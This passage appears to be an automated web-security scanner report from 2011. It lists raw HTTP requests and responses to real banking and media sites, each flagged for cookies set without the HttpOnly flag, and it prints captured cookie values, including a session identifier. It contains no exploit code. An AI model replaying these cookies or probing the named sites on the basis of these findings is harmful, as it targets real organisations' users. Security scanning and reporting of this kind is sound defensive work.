GET /script/jpmVideoPlayerHelper.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:44 GMT Server: Apache Last-Modified: Tue, 19 Oct 2010 20:53:29 GMT ETag: "2cd51-436-7c252440" Accept-Ranges: bytes Content-Length: 1078 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
var lightBoxTime = 0;
function embedCallback(status) { }
function addFlashBoundaryCallback() { theFlash = document.getElementById('jpmvplayer'); theFlash.onmouseout=function(e) {
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/jquery-1.3.2.min.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACE_COOKIE=R2666079405; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:42 GMT Server: Apache Last-Modified: Wed, 10 Mar 2010 23:36:59 GMT ETag: "2cd46-dfa9-c6413cc0" Accept-Ranges: bytes Content-Length: 57257 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
/* * jQuery JavaScript Library v1.3.2 * http://jquery.com/ * * Copyright (c) 2009 John Resig * Dual licensed under the MIT and GPL licenses. * http://docs.jquery.com/License * * Date: 2009-02- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/jquery.bgiframe.min.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:44 GMT Server: Apache Last-Modified: Sat, 21 Jul 2007 22:45:56 GMT ETag: "2c714-57a-ce817100" Accept-Ranges: bytes Content-Length: 1402 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
/* Copyright (c) 2006 Brandon Aaron (http://brandonaaron.net) * Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php) * and GPL (http://www.opensource.org/licenses/gpl-li ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/jquery.pngFix.pack.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACE_COOKIE=R2666079405; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:42 GMT Server: Apache Last-Modified: Fri, 08 Oct 2010 22:55:29 GMT ETag: "2bc00-9bf-e8325a40" Accept-Ranges: bytes Content-Length: 2495 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
/** * -------------------------------------------------------------------- * jQuery-Plugin "pngFix" * Version: 1.1, 11.09.2007 * by Andreas Eberhard, andreas.eberhard@gmail.com * ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/jquery_jpm_custom.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACE_COOKIE=R2666079405; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:42 GMT Server: Apache Last-Modified: Tue, 19 Oct 2010 20:54:04 GMT ETag: "2cd45-3e2e-7e3b3300" Accept-Ranges: bytes Content-Length: 15918 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
// tabWidget custom class - Darren Andes jQuery.fn.tabWidget=function(divTabId,props){props=jQuery.extend({show:0},props?props:{});var _ref=this;this.divTabId=divTabId;this.items=jQuery(this).child ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/lightbox_support/builder.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:45 GMT Server: Apache Last-Modified: Thu, 15 Jul 2010 19:52:10 GMT ETag: "8e6f7-1288-70180e80" Accept-Ranges: bytes Content-Length: 4744 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
// script.aculo.us builder.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009
// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // // script.aculo.us is freely distributabl ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/lightbox_support/controls.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:46 GMT Server: Apache Last-Modified: Thu, 15 Jul 2010 19:52:56 GMT ETag: "8e703-87e3-72d5f600" Accept-Ranges: bytes Content-Length: 34787 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
// script.aculo.us controls.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009
// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // (c) 2005-2009 Ivan Krstic (htt ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/lightbox_support/dragdrop.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:46 GMT Server: Apache Last-Modified: Thu, 15 Jul 2010 19:52:45 GMT ETag: "8e704-7950-722e1d40" Accept-Ranges: bytes Content-Length: 31056 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
// script.aculo.us dragdrop.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009
// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // // script.aculo.us is freely distributab ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/lightbox_support/effects.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:46 GMT Server: Apache Last-Modified: Thu, 15 Jul 2010 19:52:32 GMT ETag: "8e705-9647-7167c000" Accept-Ranges: bytes Content-Length: 38471 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
// script.aculo.us effects.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/lightbox_support/prototype.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:44 GMT Server: Apache Last-Modified: Thu, 15 Jul 2010 18:37:43 GMT ETag: "8e706-2224e-65d70bc0" Accept-Ranges: bytes Content-Length: 139854 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
/* Prototype JavaScript framework, version 1.6.1 * (c) 2005-2009 Sam Stephenson * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototype ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/lightbox_support/scriptaculous.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:44 GMT Server: Apache Last-Modified: Thu, 15 Jul 2010 18:38:24 GMT ETag: "8e707-b78-6848a800" Accept-Ranges: bytes Content-Length: 2936 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
// script.aculo.us scriptaculous.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009
// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // // Permission is hereby granted, fr ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/lightbox_support/slider.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:46 GMT Server: Apache Last-Modified: Thu, 15 Jul 2010 19:53:09 GMT ETag: "8e708-27b2-739c5340" Accept-Ranges: bytes Content-Length: 10162 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
// script.aculo.us slider.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009
// Copyright (c) 2005-2009 Marty Haught, Thomas Fuchs // // script.aculo.us is freely distributable under the terms of an MIT-style ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/lightbox_support/sound.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:46 GMT Server: Apache Last-Modified: Thu, 15 Jul 2010 19:53:21 GMT ETag: "8e709-998-74536e40" Accept-Ranges: bytes Content-Length: 2456 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
// script.aculo.us sound.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009
// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // // Based on code created by Jules Gravinese ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/lightview.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:44 GMT Server: Apache Last-Modified: Wed, 04 Aug 2010 00:45:05 GMT ETag: "2cd52-949f-bea16640" Accept-Ranges: bytes Content-Length: 38047 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
// Lightview 2.5.2.1 - 01-01-2010 // Copyright (c) 2008-2010 Nick Stakenburg (http://www.nickstakenburg.com) // // Licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/swfobject.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:45 GMT Server: Apache Last-Modified: Wed, 14 Nov 2007 17:03:46 GMT ETag: "2c723-1a42-8c6a0080" Accept-Ranges: bytes Content-Length: 6722 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
/** * SWFObject v1.4.4: Flash Player detection and embed - http://blog.deconcept.com/swfobject/ * * SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License: * http://www.opensour ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.php HTTP/1.1 Host: www.learningsolutions.com.hk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /m/pages/self-directed-investing.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /m/pages/zero-dollar-trades.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /m/pages/home.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /m/pages/merrill-edge-advisory-center.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.myschedule.navyfederal.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Length: 15100 Content-Type: text/html Content-Location: http://www.myschedule.navyfederal.org/Default.htm Last-Modified: Wed, 07 Nov 2001 15:10:00 GMT Accept-Ranges: bytes ETag: "014cf449e67c11:5e8" X-Powered-By: ASP.NET Date: Wed, 02 Feb 2011 22:19:30 GMT Connection: close Set-Cookie: TS26bd7b=a65ecccc74731a368fe90c1afa57c1bee8233e9e4dea5aa14d49d874; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.omniture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: Omniture AWS/2.0.0 Location: http://www.omniture.com/en/ Content-Length: 313 Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 01:17:24 GMT Connection: close Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.omniture.com ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy/ HTTP/1.1 Host: www.omniture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: Omniture AWS/2.0.0 Location: http://www.omniture.com/en/privacy/ Content-Length: 321 Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Wed, 02 Feb 2011 22:20:01 GMT Connection: close Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.omniture.com ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.pnccardservicesonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:20:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: DefaultBrand=NatCityMain; expires=Thu, 02-Feb-2012 22:20:17 GMT; path=/; secure Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 12377
The following cookie was issued by the application and does not have the HttpOnly flag set:
NSC_xfcdmvtufs=dddbcc5b3660;Version=1;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /opinion/contributors/content/CT_nefish_01-11-11_ORLPT84_v8.4117508.html HTTP/1.1
Host: www.projo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:29 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Expires: now
Cache-Control: no-cache,no-store,private,must-revalidate
Pragma: no-cache
P3P: policyref="http://ads.belointeractive.com/w3c/p3p.xml", CP="NOI DSP CUR ADMa DEVa TAIa OUR IND UNI COM NAV INT"
Keep-Alive: timeout=600
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_xfcdmvtufs=dddbcc5b3660;Version=1;path=/
Content-Length: 75680
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:pas="http://www.projo.com/200 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /IRA/pages/home.aspx HTTP/1.1
Host: www.retirement.merrilledge.com
Accept: */*
Accept-Language: en
